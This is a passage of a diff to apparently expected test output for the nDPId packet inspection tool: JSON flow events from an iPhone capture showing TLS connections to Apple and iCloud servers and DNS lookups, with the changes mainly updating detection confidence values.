+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03624{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalueservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-key
valueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}} 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454599054,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1582454599054,"pkt":"AQBeAAAWxGGLNYKpCABGAAAoAABAAAECQgDAqAIR4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7"} 
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599065,"flow_last_seen":1582454599065,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599065,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1582454599065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1582454599065,"pkt":"xiwDYGpkxGGLNYKpCABFAAA7Z5IAAP8RzrzAqAIRwKgCAfLQADUAJ+lbzwoBAAABAAAAAAAAA2dzYQVhcHBsZQNjb20AAAEAAQ=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599065,"flow_last_seen":1582454599065,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599065,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599065,"flow_last_seen":1582454599065,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599065,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": 
{"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599073,"flow_last_seen":1582454599073,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454599073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1582454599073,"pkt":"xiwDYGpkxGGLNYKpCABFAAA7y\/EAAP8Ral3AqAIRwKgCAcs\/ADUAJ2vSdCUBAAABAAAAAAAAA2dzYQVhcHBsZQNjb20AAAEAAQ=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599073,"flow_last_seen":1582454599073,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599073,"flow_last_seen":1582454599073,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1582454599105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1582454599105,"pkt":"xGGLNYKpxiwDYGpkCABFAABxJf8AAEARzxrAqAIBwKgCEQA18tAAXXwrzwqBgAABAAIAAAAAA2dzYQVhcHBsZQNjb20AAAEAAcAMAAUAAQAAEZYAGgNnc2EFYXBwbGUDY29tBmFrYWRucwNuZXQAwCsAAQABAAAA4QAEEYmmIw=="} -00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": 
{"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} +00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454599105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1582454599105,"pkt":"xGGLNYKpxiwDYGpkCABFAABx6W4AAEARC6vAqAIBwKgCEQA1yz8AXf6hdCWBgAABAAIAAAAAA2dzYQVhcHBsZQNjb20AAAEAAcAMAAUAAQAAEZYAGgNnc2EFYXBwbGUDY29tBmFrYWRucwNuZXQAwCsAAQABAAAA4QAEEYmmIw=="} 
-00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} +00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599225,"flow_last_seen":1582454599225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599225,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454599225,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599225,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WYAbuypew6AAAAALDC\/\/9PDwAAAgQFtAEDAwcBAQgKEd\/qGwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454599259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599259,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZj0WnUXsqXsO6BScSAj8wAAAgQFrAEBCApbEwn1Ed\/qGwEDAwU="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1582454599261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599261,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WYAbuypew79Fp1GIAQBAu8hwAAAQEIChHf6p1bEwn1"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 
+00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, 